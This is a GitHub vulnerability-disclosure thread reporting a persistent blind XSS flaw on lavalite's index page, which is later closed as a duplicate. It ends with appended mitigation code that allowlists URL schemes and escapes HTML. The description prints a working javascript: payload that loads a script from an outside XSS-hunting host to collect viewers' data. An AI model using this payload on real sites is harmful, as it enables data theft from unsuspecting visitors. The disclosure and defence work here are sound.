Persistent Blind XSS triggered in lavalite @index page #705

Closed

@B3EF B3EF commented Sep 19, 2020

✍️ Description

During my hunt for XSS, I accidentally dropped an XSS payload which was accidentally shown on the index page, leading to a persistent XSS triggered entirely from a different account. Even if an unauthenticated user views the index page, the XSS payload gets triggered and sends the corresponding user's IP address and other stuff to the XSS payload user. It's a kind of account takeover vulnerability, but as we are already admin it doesn't mean anything to us, so this can be considered a persistent XSS at the index page of lavalite.
Payload:

javascript:eval('var a=document.createElement(\'script\');a.src=\'https://beefee.xss.ht\';document.body.appendChild(a)')

POC in the README.md file

💥 Impact

XSS payloads executed.

✅ Checklist

  • Created and populated the README.md and vulnerability.json files
  • Provided the repository URL and any applicable permalinks
  • Defined all the applicable weaknesses (CWEs)
  • Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
  • Checked that the vulnerability affects the latest version of the package released
  • Checked that a fix does not currently exist that remediates this vulnerability
  • Complied with all applicable laws

@huntr-helper huntr-helper added the disclosure Vulnerability disclosure label Sep 19, 2020
@B3EF B3EF changed the title persistent Blind XSS triggered in lavalite @index page Persistent Blind XSS triggered in lavalite @index page Sep 21, 2020

@Mik317 Mik317 left a comment

LGTM 😄 🎉

Cheers,
Mik

@mufeedvh mufeedvh left a comment

LGTM 👏🎉

@ghost ghost mentioned this pull request Oct 6, 2020

ghost commented Oct 6, 2020

Closed as duplicate of #690 👍

@ghost ghost closed this Oct 6, 2020
This pull request was closed.
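
The payload in the description is a `javascript:` URL, so one mitigation is to allowlist URL schemes before a stored value is rendered as a link target. The following is an added example, not lavalite code and not part of the original report; it assumes the stored value ends up in an `href` attribute (the report does not say which field), and `SITE_BASE`, `safeLinkTarget`, `escapeAttr` and `renderLink` are hypothetical names.

```javascript
// Added example (not lavalite code). Assumption: a user-supplied string is
// stored and later written into an href attribute on a public page.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:", "mailto:"]);
// Hypothetical site origin, used only to resolve relative links.
const SITE_BASE = "https://site.example/";

// Returns a normalized URL string that is safe as a link target, or null.
// The WHATWG URL parser applies the same normalization a browser does
// (trims leading spaces and control characters, drops tabs and newlines,
// lowercases the scheme), so the check sees the scheme the browser acts on.
function safeLinkTarget(value, base = SITE_BASE) {
  if (typeof value !== "string" || value.length > 2048) return null;
  let url;
  try {
    url = new URL(value, base);
  } catch {
    return null; // unparseable input is rejected, not passed through
  }
  return ALLOWED_PROTOCOLS.has(url.protocol) ? url.href : null;
}

// Escapes a value for use in HTML text or a double-quoted attribute.
function escapeAttr(text) {
  return text.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Renders a link; a rejected target degrades to plain escaped text.
function renderLink(value, label) {
  const href = safeLinkTarget(value);
  const safeLabel = escapeAttr(label);
  return href === null
    ? `<span>${safeLabel}</span>`
    : `<a href="${escapeAttr(href)}" rel="noopener noreferrer">${safeLabel}</a>`;
}
```

The scheme check complements output encoding and does not replace it: encoding alone leaves a `javascript:` URL intact inside a correctly quoted attribute.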